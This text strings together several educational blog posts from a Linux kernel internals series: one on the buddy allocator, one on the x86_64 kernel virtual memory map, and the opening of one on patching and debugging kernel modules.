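If it helps to see that walk-up-and-split logic as code, here’s a deliberately tiny userspace model of it. To be clear, this is a sketch and not how the kernel implements things: it only tracks how many free chunks each order has (no real lists or addresses), and struct toy_buddy, toy_size_to_order() and toy_alloc() are all names I’ve made up:

```c
#define TOY_PAGE_SIZE 0x1000UL  /* assumption: 4KB pages */
#define TOY_MAX_ORDER 11        /* assumption: orders 0..10 */

/* nr_free[n] = number of free order-n chunks (toy state, no real lists). */
struct toy_buddy {
    unsigned long nr_free[TOY_MAX_ORDER];
};

/* Smallest order whose chunk size covers `bytes` (log2 of pages, rounded up). */
static unsigned int toy_size_to_order(unsigned long bytes)
{
    unsigned long pages = (bytes + TOY_PAGE_SIZE - 1) / TOY_PAGE_SIZE;
    unsigned int order = 0;

    while ((1UL << order) < pages)
        order++;
    return order;
}

/* Returns 0 on success, -1 if no chunk of sufficient order is free. */
static int toy_alloc(struct toy_buddy *b, unsigned int order)
{
    unsigned int cur = order;

    /* Walk up the freelists until one has a free chunk. */
    while (cur < TOY_MAX_ORDER && b->nr_free[cur] == 0)
        cur++;
    if (cur >= TOY_MAX_ORDER)
        return -1;

    b->nr_free[cur]--;      /* take the chunk off its freelist */
    while (cur > order) {   /* split until it is the size we asked for */
        cur--;
        b->nr_free[cur]++;  /* one half goes back as a free buddy */
    }
    return 0;               /* the other half goes to the caller */
}
```

Starting with a single free order-3 chunk, an order-2 request (e.g. toy_size_to_order(0x4000)) takes it, splits it once and leaves one order-2 buddy behind for the next caller.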

And there we are, a grossly-simplified (as always) overview of the buddy allocator within the Linux kernel. Perhaps I made a mistake intertwining code snippets and kernel specifics with a simplified approach, but hopefully it all made sense!

Nodes, Zones & Memory Stuff

Okay, so we’ve covered things at a fairly high level, but I’d be remiss if I didn’t clarify some of the specifics I glossed over in the last section, so buckle up.

First of all, in theme with our ongoing virtual memory series, let’s clarify what exactly is being allocated here. We already know we’re dealing with pages of memory, but where?

The buddy allocator is a virtual memory allocator, although it allocates from the kernel region defined by __PAGE_OFFSET_BASE (aka lowmem aka physmap) which you’ll recall[1] is a 1:1 virtual mapping of physical memory. That is, lowmem address x+1 will map to physical address y+1, x+2 to y+2, x+N to y+N etc., so virtually contiguous memory from this region is guaranteed to be physically contiguous too.

Keeping things relatively brief again, the Linux kernel organises physical memory into a tree-like hierarchy of nodes made up of zones made up of page frames[2]:

Nodes: these data structures, represented by [pg_data_t](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L934), are abstractions of actual physical hardware stuff, specifically a node represents a “bank” of physical memory
Zones: suffice to say nodes are made up of zones, represented by [struct zone](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L514), which represent ranges within memory
Page frames: zones are then made up of pages, represented by [struct page](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mm_types.h#L72). Where a page describes a fixed-length (PAGE_SIZE) contiguous block of virtual memory, a page frame is a fixed-length contiguous block of physical memory that pages are mapped to

Expanding on `free_area`

Why am I burdening you with this knowledge? The answer is because not only did I leave out some details in the code snippet above but I straight up altered it (it was for your own good, I swear), so now I’m going to correct my wrongs by unveiling the truth:

struct free_area {
    struct list_head    free_list[MIGRATE_TYPES]; 
    unsigned long       nr_free;
};

struct zone {
    ...
    /* free areas of different sizes */
    struct free_area    free_area[MAX_ORDER]; 
    ...
};

Okay, let’s unpack this. The buddy allocator actually keeps track of multiple freelists, free_area[], specifically one per zone. We can see that here, as the freelist is actually a member of the struct zone which we touched on a moment ago.

Why? Err, good question. I won’t delve into the nuances of NUMA/UMA systems and all that stuff but suffice to say when the buddy allocator is asked to allocate some memory, it may want to pick a zone from the node that is associated with the calling context (think “closest” node or most optimal).

Now that we have the full(ish) context, we can do a little bit of introspection and get some hands on using our ol’ faithful procfs:

$ cat /proc/buddyinfo 
----- zone info ------|    0   |  1   |  2   |  3   |  4   |  5   |  6   |  7   |  8   |  9   | 10  
-------------------------------------------------------------------------------------------------
Node 0, zone      DMA      0      0      0      0      0      0      0      0      1      1      2 
Node 0, zone    DMA32  11311   2358   1052    567    290    123     52     33     18     25      8 
Node 0, zone   Normal   5977    942   2093   1983    804    256     93     45     28     39      4

I’ve added some headers in (lines 2-3), but what we’re seeing here is a row for each zone’s buddy allocator freelist, free_area[MAX_ORDER]. The first column tells us the node and zone, then each column after that tells us how many free chunks (nr_free) there are for each page order, starting from order 0 and moving up to order MAX_ORDER - 1 (10 here). Neat, right?
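Since each column counts chunks rather than pages, a little arithmetic is needed to turn a row into an amount of free memory. Here’s a minimal sketch that parses one row in the format shown above (without my added headers) and sums the free pages; buddyinfo_free_pages() is a hypothetical helper name, and the parsing assumes the “Node N, zone NAME counts...” layout from the output:

```c
#include <stdio.h>
#include <stdlib.h>

/*
 * Sum the free pages described by one /proc/buddyinfo row.
 * Returns the total in pages, or 0 if the row does not parse.
 */
static unsigned long buddyinfo_free_pages(const char *line)
{
    int node, consumed = 0;
    char zone[32];
    unsigned long total = 0;
    unsigned int order = 0;
    char *end;

    /* Skip over the "Node N, zone NAME" prefix. */
    if (sscanf(line, "Node %d, zone %31s%n", &node, zone, &consumed) != 2)
        return 0;
    line += consumed;

    for (;;) {
        unsigned long chunks = strtoul(line, &end, 10);

        if (end == line)            /* no more numbers on this row */
            break;
        total += chunks << order;   /* each chunk is 2^order pages */
        order++;
        line = end;
    }
    return total;
}
```

Feeding it the DMA row from above gives 2^8 + 2^9 + 2 * 2^10 = 2816 free pages, which is 11MB with 4KB pages.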

Moving back to the deception, the doubly linked circular list we said pointed to all the free chunks? Well that’s actually an array of linked circular lists: free_list[MIGRATE_TYPES]. Don’t worry though, each list in the array still points to free chunks. Pages of different types, defined by the enum [MIGRATE_TYPES](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L67), are just stored in separate lists in this array.

Touching on `struct page`

Although I’m planning to cover this in much more detail in the virtual memory series, I feel like it’s worth touching on this goliath to fill in some gaps in our overview.

So we’ve already mentioned that each physical page (page frame) in the system has a [struct page](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mm_types.h#L72) associated with it. This tracks various metadata and is instrumental to the kernel’s memory management model.

Given that these represent physical pages, it might not come as a surprise to learn that the “free chunks” that free_area->free_list points to are actually references to page structs. We can see that here by poking around mm/page_alloc.c:

/*
 * Do the hard work of removing an element from the buddy allocator.
 * Call me with the zone->lock already held.
 */
static __always_inline struct page *
__rmqueue(struct zone *zone, unsigned int order, int migratetype,
						unsigned int alloc_flags)

Note the return type here, struct page * (we also see familiar qualifiers: zone, order, migrate type and flags)

Okay, whew, with that all cleared up, I think we have a reasonable overview of the buddy allocator within the Linux kernel! Hope you’re still with me as we’re not done yet!

[1] https://sam4k.com/linternals-virtual-memory-part-3/
[2] More on the topic here https://www.kernel.org/doc/gorman/html/understand/understand005.html

Using The Buddy Allocator

I figured I should get into the habit of promoting some kernel development hijinx and explore some of the APIs for the topics we discuss where relevant.

Let’s dive in then and highlight some of the API exposed to kernel developers for use in modules & device drivers. All defs can be found in [/include/linux/gfp.h](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/gfp.h):

alloc_pages(gfp_mask, order): Allocate 2^order pages (one physically contiguous chunk from the order-N freelist) and return a pointer to its first struct page
alloc_page(gfp_mask): macro for alloc_pages(gfp_mask, 0)
__get_free_pages(gfp_mask, order) and __get_free_page(gfp_mask) mirror the above functions, except they return a virtual address to the allocation as opposed to a struct page
For freeing, options include: __free_page(struct page *page), __free_pages(struct page *page, order) and free_page(unsigned long addr)
Plenty more to see if you take a browse of [/include/linux/gfp.h](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/gfp.h)

Most of that should be fairly familiar at this point, except the gfp_mask, which we haven’t covered. The gfp_mask is a set of GFP (Get Free Page) flags which let us configure the behaviour of the allocator and are used across the kernel’s memory management stuff.

The inline documentation[1] already does a good job at covering the different flags, so I won’t rehash that here. In my experience, the ones you’ll mainly see are GFP_KERNEL, GFP_KERNEL_ACCOUNT[2] and GFP_ATOMIC.

Despite a flexible API for different allocation use cases and requirements, they all ultimately call the real MVP, __alloc_pages():

/*
 * This is the 'heart' of the zoned buddy allocator.
 */
struct page *__alloc_pages(gfp_t gfp, unsigned int order, int preferred_nid,
							nodemask_t *nodemask)

/mm/page_alloc.c

We’ve already covered a lot of ground in this post, so I’ll leave it as an exercise to the reader to take a look at this function to see what we’ve covered so far in actual code :)

I’ll also use this as an opportunity to plug my long neglected repo (but I plan to push some demos for Linternals posts up too, maybe), “lmb” aka Linux Misc driver Boilerplate; a very lightweight kernel module boilerplate for bootstrapping kernel fun.

GitHub - sam4k/lmb: Very lightweight kernel module boilerplate for kernel development/testing.

[1] https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/gfp.h#L271
[2] @poppop7331 and @vnik5287 recently did a cool blog post covering modern heap exploitation, including the implications of GFP_KERNEL_ACCOUNT in recent kernel versions :)

Pros & Cons

Before we wrap up, and to give some context on the next section, let’s take what we’ve learned about the buddy allocator and highlight some of its pros and cons.

First of all, due to the nature of the buddy system algorithm behind things, the buddy allocator is fast to (de)allocate memory. Furthermore, being able to split and remerge chunks on the go, there is little external fragmentation (this is where there’s enough free memory to serve a request, just not in one contiguous chunk).

There are also other perf benefits, that we won’t dive into here, to providing physically contiguous memory and guaranteeing cache aligned memory blocks.

The main downside here is the internal fragmentation, where the chunk of memory allocated is bigger than necessary, leaving a portion of it unused. Due to the fixed sizes, determined by 2^order pages, if a request is just too big for the previous order, we’re gonna have a great deal of space wasted. Not to mention the smallest allocation is 1 page.
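To put a number on that waste, here’s a small sketch that works out how much of a chunk goes unused for a given request size. It assumes 4KB pages and ignores the upper limit on orders; toy_alloc_size() and toy_wasted_bytes() are made-up names for the example:

```c
#define TOY_PAGE_SIZE 0x1000UL  /* assumption: 4KB pages */

/* Bytes actually handed out: the next power-of-two number of pages. */
static unsigned long toy_alloc_size(unsigned long request)
{
    unsigned long size = TOY_PAGE_SIZE;  /* smallest allocation is one page */

    while (size < request)
        size <<= 1;                      /* step up one order at a time */
    return size;
}

/* Bytes left unused inside the chunk (internal fragmentation). */
static unsigned long toy_wasted_bytes(unsigned long request)
{
    return toy_alloc_size(request) - request;
}
```

Asking for 0x4001 bytes, a single byte over what order 2 can hold, lands us an order-3 chunk of 0x8000 bytes with 0x3fff of them wasted.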

tl;dr: fast, contiguous allocations, low external fragmentation, bad internal fragmentation

Wrapping Up

Memory allocation and management is an extremely complex topic with a lot of nuance which, as we saw, extends down to the hardware level.

Hopefully this has been a useful primer on one of the fundamentals to kernel memory allocation, the buddy allocator:

We covered the role of memory allocators briefly, before learning that the buddy allocator acts as a fundamental memory allocation mechanism within the Linux kernel
We learned at a high level about the buddy system algorithm behind the buddy allocator, with some peeks into the actual kernel code from the mm system
Finally we pieced together our understanding with some extras on how memory is managed by the kernel, its API and the pros/cons of the buddy allocator

Next Time!

The fun doesn’t end here, don’t you worry! We’ve just scratched the surface. I hope you’re ready to expand your repertoire of acronyms cos next time we’ll be exploring the wonderful world of slab allocators: SLAB, SLUB & SLOB.

Sitting above the buddy allocator, the slab allocator is another fundamental aspect of memory allocation and management in the Linux kernel, addressing the internal fragmentation problems of the buddy allocator - but that’s for next time!

Thanks for reading, and as always feel free to @me if you have any questions, suggestions or corrections :)

exit(0);

Linternals: The Kernel Virtual Address Space

sam4k — Tue, 10 May 2022 19:30:00 +0000

Alright, we really made it to part 3 eh? Not bad! Before we dive straight in, let’s quickly go over what we covered in the last part on the user virtual address space:

Very brief overview, with some examples, of using procfs for introspection
The various mappings that make up a typical user virtual address space
Which syscalls userspace programs make use of to set up their virtual address space
Finally tying up some extras with how threading & ASLR fit into this picture

This time we’ll be pivoting our attention towards the omnipresent kernel virtual address space, where all the true power resides, so let’s get stuck into chapter 5!

0x05 Kernel Virtual Address Space
Next Time!

0x05 Kernel Virtual Address Space

Casting our minds back to part 1, we’ll recall that:

Each process has its own, sandboxed virtual address space (VAS)
The VAS is vast, spanning all addressable memory
This VAS is split between the User VAS & Kernel VAS[1]

As we touched on in part 1, and more so in part 2, to even set up its user VAS a process needs the kernel to carry out a series of syscalls (brk(), mmap(), execve() etc.)[2].

This is because our userspace is running in usermode (i.e. unprivileged code execution) and only the kernel is able to carry out important, system-altering stuff (right??).

So if we’re in usermode and we need the kernel to do something, like mmap() some memory for us, then we need to ask the kernel to do it for us and we do this via syscalls.

Essentially, a syscall acts as an interface between usermode and kernelmode (privileged code execution), only allowing a couple of things to cross over from usermode: the syscall number & its arguments.

This way the kernel can look up the function corresponding to the syscall number, sanitise the arguments (the userspace has no power here after all) and if everything looks good, it can carry out the privileged work, return to the syscall handler which can transition back to usermode, only allowing one thing to cross over: the result of the syscall.
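To see that “syscall number in, result out” flow from the userspace side, here’s a minimal sketch that uses glibc’s generic syscall() wrapper rather than the usual getpid() helper. SYS_getpid is the syscall number (it takes no arguments), and raw_getpid() is just a name I’ve picked for the example:

```c
#define _GNU_SOURCE
#include <sys/syscall.h>
#include <unistd.h>

/*
 * Ask the kernel for our PID by syscall number. The only thing that
 * crosses back over to usermode is the return value.
 */
static long raw_getpid(void)
{
    return syscall(SYS_getpid);
}
```

On a Linux box this should hand back the same value as getpid(), which is typically just a thin wrapper around the same syscall.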

This is all a roundabout way of broaching the question: we understand the userspace, but when we make a syscall[3], what is it running and how does it know where to find it?

And THAT is where the kernel virtual address space comes in. Got there eventually, right?

[1] The VAS is often so vast (e.g. on 64-bit systems), that rather than splitting the entire address space an upper & lower portion are assigned to the kernel and user respectively, with the majority in between being non-canonical/unused addresses.
[2] We touched more on syscalls back in part 1, “User-mode & Kernel-mode”
[3] In the future I might dedicate a full post (or 3 lol) to the syscall interface, so if that’s something you’d be into, feel free to poke me on Twitter

One Mapping To Rule Them All

Okay, so I know we’re all eager to dig around the kernel VAS, but it’s worth noting a fairly fundamental difference here: while each process has its own unique user VAS, they all share the same kernel VAS.

Huh? What exactly does this mean? Well, to put it simply, all our processes are interacting with the same kernel, so each process’s kernel VAS maps to the same physical memory.

As such, any changes within the kernel will be reflected across all processes. It’s important to note (and we’ll cover the why in more detail later) that when we’re in usermode we have no read/write access to this kernel virtual address space.

This is an extremely high-level overview of the topic and the actual details will vary based on architecture & security mitigations, but for now just remember that all processes share the same kernel VAS.

Kernel Virtual Memory Map

Unfortunately things aren’t going to be as tidy and straightforward as our tour of the user virtual address space. The contents of kernelspace vary depending on architecture and there isn’t any easy-to-visualise introspection via procfs.

As I’ve mentioned before in Linternals, I’ll be focusing on x86_64 when architecture specifics come into play. So although we don’t have procfs, we do have kernel docs!

[Documentation/x86/x86_64/mm.txt](https://www.kernel.org/doc/Documentation/x86/x86_64/mm.txt), specifically, provides a /proc/self/maps-esque breakdown of the x86_64 virtual memory map, including both UVAS & KVAS; which is perfect for us[1]:

========================================================================================================================
    Start addr    |   Offset   |     End addr     |  Size   | VM area description
========================================================================================================================
                  |            |                  |         |
 0000000000000000 |    0       | 00007fffffffffff |  128 TB | user-space virtual memory, different per mm
__________________|____________|__________________|_________|___________________________________________________________
                  |            |                  |         |
 0000800000000000 | +128    TB | ffff7fffffffffff | ~16M TB | ... huge, almost 64 bits wide hole of non-canonical
                  |            |                  |         |     virtual memory addresses up to the -128 TB
                  |            |                  |         |     starting offset of kernel mappings.
__________________|____________|__________________|_________|___________________________________________________________
                                                            |
                                                            | Kernel-space virtual memory, shared between all processes:
____________________________________________________________|___________________________________________________________
                  |            |                  |         |
 ffff800000000000 | -128    TB | ffff87ffffffffff |    8 TB | ... guard hole, also reserved for hypervisor
 ffff880000000000 | -120    TB | ffff887fffffffff |  0.5 TB | LDT remap for PTI
 ffff888000000000 | -119.5  TB | ffffc87fffffffff |   64 TB | direct mapping of all physical memory (page_offset_base)
 ffffc88000000000 |  -55.5  TB | ffffc8ffffffffff |  0.5 TB | ... unused hole
 ffffc90000000000 |  -55    TB | ffffe8ffffffffff |   32 TB | vmalloc/ioremap space (vmalloc_base)
 ffffe90000000000 |  -23    TB | ffffe9ffffffffff |    1 TB | ... unused hole
 ffffea0000000000 |  -22    TB | ffffeaffffffffff |    1 TB | virtual memory map (vmemmap_base)
 ffffeb0000000000 |  -21    TB | ffffebffffffffff |    1 TB | ... unused hole
 ffffec0000000000 |  -20    TB | fffffbffffffffff |   16 TB | KASAN shadow memory
__________________|____________|__________________|_________|____________________________________________________________
                                                            |
                                                            | Identical layout to the 56-bit one from here on:
____________________________________________________________|____________________________________________________________
                  |            |                  |         |
 fffffc0000000000 |   -4    TB | fffffdffffffffff |    2 TB | ... unused hole
                  |            |                  |         | vaddr_end for KASLR
 fffffe0000000000 |   -2    TB | fffffe7fffffffff |  0.5 TB | cpu_entry_area mapping
 fffffe8000000000 |   -1.5  TB | fffffeffffffffff |  0.5 TB | ... unused hole
 ffffff0000000000 |   -1    TB | ffffff7fffffffff |  0.5 TB | %esp fixup stacks
 ffffff8000000000 | -512    GB | ffffffeeffffffff |  444 GB | ... unused hole
 ffffffef00000000 |  -68    GB | fffffffeffffffff |   64 GB | EFI region mapping space
 ffffffff00000000 |   -4    GB | ffffffff7fffffff |    2 GB | ... unused hole
 ffffffff80000000 |   -2    GB | ffffffff9fffffff |  512 MB | kernel text mapping, mapped to physical address 0
 ffffffff80000000 |-2048    MB |                  |         |
 ffffffffa0000000 |-1536    MB | fffffffffeffffff | 1520 MB | module mapping space
 ffffffffff000000 |  -16    MB |                  |         |
    FIXADDR_START | ~-11    MB | ffffffffff5fffff | ~0.5 MB | kernel-internal fixmap range, variable size and offset
 ffffffffff600000 |  -10    MB | ffffffffff600fff |    4 kB | legacy vsyscall ABI
 ffffffffffe00000 |   -2    MB | ffffffffffffffff |    2 MB | ... unused hole
__________________|____________|__________________|_________|___________________________________________________________

Line 5: We’ve touched on this previously, the lower portion of our virtual address space[2] makes up the userspace. Size varies per architecture.

Line 8: Remember how the virtual address space spans every possible address, which is A LOT? As a result, the majority of this is non-canonical, unused space.
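For the layout in the table above, where userspace ends at 0x00007fffffffffff and kernelspace starts at 0xffff800000000000, telling canonical from non-canonical addresses boils down to checking that bits 63 to 47 are either all clear or all set. A minimal sketch, assuming that 48-bit layout (is_canonical_48() is a hypothetical name):

```c
#include <stdbool.h>
#include <stdint.h>

/*
 * For the 48-bit layout in the table: an address is canonical if
 * bits 63..47 are all 0 (lower half) or all 1 (upper half).
 */
static bool is_canonical_48(uint64_t addr)
{
    uint64_t top = addr >> 47;  /* the upper 17 bits */

    return top == 0 || top == 0x1ffff;
}
```

Anything in the big hole between the two halves fails the check, e.g. 0x0000800000000000, the first address past the end of userspace.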

Line 16: My understanding is the guard hole initially existed to prevent accidental accesses to the non-canonical region (which would cause trouble), nowadays the space is also used to load hypervisors into.

Line 17: This will make more sense after we cover virtual memory implementation, but the per-process Local Descriptor Table describes private memory descriptor segments[3].

When Page Table Isolation (a mitigation, see below) is enabled, the LDT is mapped to this kernelspace region to mitigate the contents being accessed by attackers.

Line 18: Defined by __PAGE_OFFSET_BASE, the “physmap” (aka lowmem) can be seen as the start of the kernelspace proper. It is used as a 1:1 mapping of physical memory.

To recap, virtual addresses can be mapped to somewhere in physical memory. E.g. if we load a library into our virtual address space, the virtual address it’s been mapped to actually points to some physical memory where that’s been loaded to.

In another process, with its own virtual address space, that same virtual address may be mapped to a completely different physical memory address.

Unlike typical virtual addresses (we’ll touch on how they’re translated), addresses in the physmap region are called kernel logical addresses. Any given kernel logical address is a fixed offset ([PAGE_OFFSET](https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/page_types.h#L36)) from the corresponding physical address.

E.g. PAGE_OFFSET == physical address 0x00, PAGE_OFFSET+0x01 == physical address 0x01 etc. etc.
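In code, that fixed-offset relationship is about as simple as address translation gets. Here’s a minimal sketch, assuming the physmap base from the table above (0xffff888000000000); on a real system KASLR can move that base, so treat the constant as illustrative. The toy_ helpers are made-up names that loosely mirror what the kernel’s __va()/__pa() do for this region:

```c
#include <stdint.h>

/* Assumption: physmap base taken from the table; KASLR may randomise it. */
#define TOY_PAGE_OFFSET 0xffff888000000000ULL

/* Physical address -> kernel logical (physmap) address. */
static uint64_t toy_phys_to_virt(uint64_t phys)
{
    return phys + TOY_PAGE_OFFSET;
}

/* Kernel logical (physmap) address -> physical address. */
static uint64_t toy_virt_to_phys(uint64_t virt)
{
    return virt - TOY_PAGE_OFFSET;
}
```

No page table walk is needed to reason about these addresses, which is exactly what makes kernel logical addresses cheap to work with.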

Line 19: Not much more to say about these, other than it’s an unused region!

Line 20[4]: Defined by VMALLOC_START and VMALLOC_END, this virtual memory region is reserved for non-contiguous physical memory allocations via the [vmalloc()](https://elixir.bootlin.com/linux/v5.17.5/source/include/linux/vmalloc.h#L146) family of kernel functions (aka highmem region).

This is similar to how we initially understood virtual memory, where two contiguous virtual addresses in the vmalloc region may not necessarily map to two contiguous physical memory addresses (unlike physmap which we just covered).

This region is also used by [ioremap()](https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/io.h#L207), which doesn’t actually allocate physical memory like vmalloc() but instead allows you to map a specified physical address range. E.g. allocating virtual memory to map I/O stuff for your GPU.

To oversimplify (we’ll expand on this later): because addresses in this region can’t be translated with a simple physical address = logical address - PAGE_OFFSET, vmalloc() carries more overhead behind the scenes than, say, kmalloc(), which returns addresses from the physmap region.

Line 21: Another unused memory region!

Line 22[5]: Defined by [VMEMMAP_START](https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/pgtable_64_types.h#L135), this region is used by the [SPARSEMEM](https://www.kernel.org/doc/html/latest/vm/memory-model.html) memory model in Linux to map the vmemmap. This is a global array, in virtual memory, that indexes all the chunks (pages) of memory currently tracked by the kernel.

Line 23: Aaand another unused memory region!

Line 24[6]: The Kernel Address Sanitiser (KASAN) is a dynamic memory error detector, used for finding use-after-free and out-of-bounds bugs. When enabled, CONFIG_KASAN=y, this region is used as shadow memory by KASAN.

This basically means KASAN uses this shadow memory to track the state of kernel memory (e.g. whether a given range is currently allocated or has been freed), which it then consults on memory accesses to make sure there’s no shenanigans or undefined behaviour going on.
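For the curious, here's a hedged sketch of how an address maps to its shadow byte. It assumes generic KASAN on x86_64, where one shadow byte covers 8 bytes of memory, and the usual KASAN_SHADOW_OFFSET for that setup; treat both values as assumptions to check against your own config.

```python
KASAN_SHADOW_OFFSET = 0xdffffc0000000000  # assumption: x86_64 generic KASAN
KASAN_SHADOW_SCALE_SHIFT = 3              # one shadow byte per 8 bytes of memory
MASK64 = (1 << 64) - 1                    # emulate 64-bit wraparound


def mem_to_shadow(addr: int) -> int:
    """Address of the shadow byte tracking the 8-byte granule containing `addr`."""
    return ((addr >> KASAN_SHADOW_SCALE_SHIFT) + KASAN_SHADOW_OFFSET) & MASK64


# The start of the kernel half of the address space maps to the start of the
# KASAN shadow region described in mm.txt for 4-level paging.
print(hex(mem_to_shadow(0xffff800000000000)))
```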

Line 30: You get the idea, unused.

Line 31: Straight from the comments, defined by [CPU_ENTRY_AREA_BASE](https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/pgtable_64_types.h#L157), “cpu_entry_area is a percpu region that contains things needed by the CPU and early entry/exit code”[7]. The [struct cpu_entry_area](https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/cpu_entry_area.h#L90) can share more insights on its role.

CPU_ENTRY_AREA_BASE is also used by [vaddr_end](https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/mm/kaslr.c#L41), which along with vaddr_start marks the virtual address range for Kernel Address Space Layout Randomization (KASLR).

Line 32: Yep, unused region.

Line 33: Enabled with CONFIG_X86_ESPFIX64=y, this region is used to, and I honestly don’t blame you if this makes no sense yet, fix issues with returning from kernelspace to userspace when using a 16-bit stack…

Again, the comments can be insightful here, so feel free to take a gander at the implementation in [arch/x86/kernel/espfix_64.c](https://elixir.bootlin.com/linux/latest/source/arch/x86/kernel/espfix_64.c).

Line 34: Another unused region.

Line 35: Defined by [EFI_VA_START](https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/pgtable_64_types.h#L159), this region unsurprisingly is used for EFI related stuff. This is the same Extensible Firmware Interface we touch on in the (currently unfinished, oops) Linternals series on The (Modern) Boot Process.

Line 36: More unused memory.

Line 37: This region is used as a 1:1 mapping of the kernel’s text section, defined by [__START_KERNEL_map](https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/page_64_types.h#L50). As we mentioned before, the kernel image is formatted like any other ELF, so has the same sections.

This is where we find all the functions in your kernel image, which is handy for debugging! In this instance, if we’re debugging an x86_64 target we can get a rough idea of what we’re looking at just from the address.

If we see the 0xffffffff8....... then we know we’re looking at the text section!

Line 38: Any dynamically loaded (think insmod) modules are mapped into this region, which sits just after the kernel text mapping as we can see in the definition:

#define MODULES_VADDR (__START_KERNEL_map + KERNEL_IMAGE_SIZE)
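Putting the last two regions together, here's a small sketch that evaluates that define and guesses which region an address falls in. The constants are assumptions taken from the v5.17 x86_64 headers and mm.txt: KERNEL_IMAGE_SIZE is 512MiB, or 1GiB when the kernel is built with CONFIG_RANDOMIZE_BASE, and the module region is taken to end at 0xffffffffff000000. The classify() helper is purely illustrative.

```python
START_KERNEL_MAP = 0xffffffff80000000  # __START_KERNEL_map
MODULES_END = 0xffffffffff000000       # assumption: end of module mapping (mm.txt)
MIB = 1024 * 1024


def modules_vaddr(randomize_base: bool) -> int:
    """Evaluate MODULES_VADDR = __START_KERNEL_map + KERNEL_IMAGE_SIZE."""
    kernel_image_size = (1024 if randomize_base else 512) * MIB
    return START_KERNEL_MAP + kernel_image_size


def classify(addr: int, randomize_base: bool) -> str:
    """Rough guess at the region an address belongs to (illustrative only)."""
    modules_start = modules_vaddr(randomize_base)
    if START_KERNEL_MAP <= addr < modules_start:
        return "kernel text mapping"
    if modules_start <= addr < MODULES_END:
        return "module mapping"
    return "somewhere else"


print(hex(modules_vaddr(randomize_base=False)))  # 0xffffffffa0000000
print(classify(0xffffffff81c3f9fe, randomize_base=False))
```

So on a kernel built with CONFIG_RANDOMIZE_BASE the 0xffffffff8....... rule of thumb stretches a little: text can sit anywhere up to 0xffffffffbfffffff, with modules starting at 0xffffffffc0000000.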

Line 39: Defined by [FIXADDR_START](https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/fixmap.h#L151), this region is used for “fix-mapped” addresses. These are special virtual addresses which are set/used at compile-time, but are mapped to physical memory at boot.

The [fix_to_virt()](https://elixir.bootlin.com/linux/v5.17.6/source/include/asm-generic/fixmap.h#L30) family of functions are used to work with these special addresses.

Line 40: We actually snuck this in to our last part! To recap, this region is:

a legacy mapping that actually provided an executable mapping of kernel code for specific syscalls that didn’t require elevated privileges and hence the whole user -> kernel mode context switch. Suffice to say it’s defunct now, and calls to vsyscall table still work for compatibility, but now actually trap and act as a normal syscall

Line 41: Our final unused memory region!

The eagle-eyed will note there’s a couple of diagrams in mm.txt, one for 4-level page tables and one for 5-level. We’ll touch on what this means in the next section, for now just know that 4-level is more common atm
Specifically, depending on the arch, the most significant N bits are always 0 for userspace and 1 for kernelspace; on x86_64 with 4-level paging this is bits 47-63. This leaves 2^47 bytes of addressing for each of userspace and kernelspace (128TB apiece)
https://en-academic.com/dic.nsf/enwiki/1553430
https://www.oreilly.com/library/view/linux-device-drivers/0596000081/ch07s04.html
https://blogs.oracle.com/linux/post/minimizing-struct-page-overhead
https://www.kernel.org/doc/html/latest/dev-tools/kasan.html
https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/cpu_entry_area.h#L90

Wrapping Up

We did it! We’ve covered all the regions described in the kernel x86_64 4-level page table (we’ll get on that in the next section) virtual memory map!

Hopefully there was enough detail here to provide some interesting context, but not so much that you might as well have been reading the source. For the more curious, we’ll be focusing more on implementation details in the next part.

Digging Deeper

If you’re interested in exploring some of these concepts yourself, don’t be scared away by the source! Diving into some of the #define’s and symbols we’ve mentioned so far and rooting around can be a good way to get started. bootlin’s Elixir Cross Referencer is easy to use and you can jump about the source in your browser.

Additionally, playing around with drgn (live kernel introspection), gdb (we covered getting setup in this post) and coding is a fun way to get stuck in and explore these memory topics.

Next Time!

After 3 parts, we’ve laid a solid foundation for our understanding of what virtual memory is and the role it plays in Linux; both in the userspace and kernelspace.

Armed with this knowledge, we’re in a prime position to begin digging a little deeper and getting into some real Linternals as we take a look at how things are actually implemented.

Next time we’ll begin to take a look, at both an operating system and hardware level, at how this all works. I’m not going to pretend I know how many parts that’ll take!

Down the line I would also like to close this topic by bringing everything we’ve learnt together by covering some exploitation techniques and mitigations RE virtual memory.

Thanks for reading!

exit(0);

Patching, Instrumenting & Debugging Linux Kernel Modules

sam4k — Fri, 15 Apr 2022 16:13:50 +0000

So not long ago I found myself having to test a fix in a Linux networking module as part of the coordinated vulnerability disclosure I posted about recently.

Maybe my Google-fu wasn’t on point, but it wasn’t immediately clear what the best approach was, so hopefully this post can provide some direction for anyone interested in quickly patching, or instrumenting, Linux kernel modules.

Now, if we’re talking about patching and instrumentation in the Linux kernel, I’d be remiss not to at least touch on some debugging basics as well, right? So hopefully between those three topics we should be able to cover some good ground in this post!

❗

This post ended up being quite long, so if you like a narrative and hearing the why behind the how, please continue! But for brevity I’ve also included the essentials in my repo over at sam4k/linux-kernel-resources.

Preamble
- Kernel Module?
Getting Setup
Getting Stuck In
FAQ
Postamble

Preamble

This post is written in the context of kernel security research, which might deviate from other use cases, so bear that in mind when reading this post.

When finding a vuln, or looking into an existing bug, I’ll want to set up a representative environment to play around with it. This basically just means setting up an Ubuntu VM (representative of a typical in-the-wild box) with a vulnerable kernel version.

The only real hard requirement I assume, is that you’re doing your kernel stuff in a VM; as this’ll make debugging the kernel a lot easier down the line.

Kernel Module?

In the early, early days (<1995) the Linux kernel was truly monolithic. Any functionality needed to be built into the base kernel at build time and that was that.

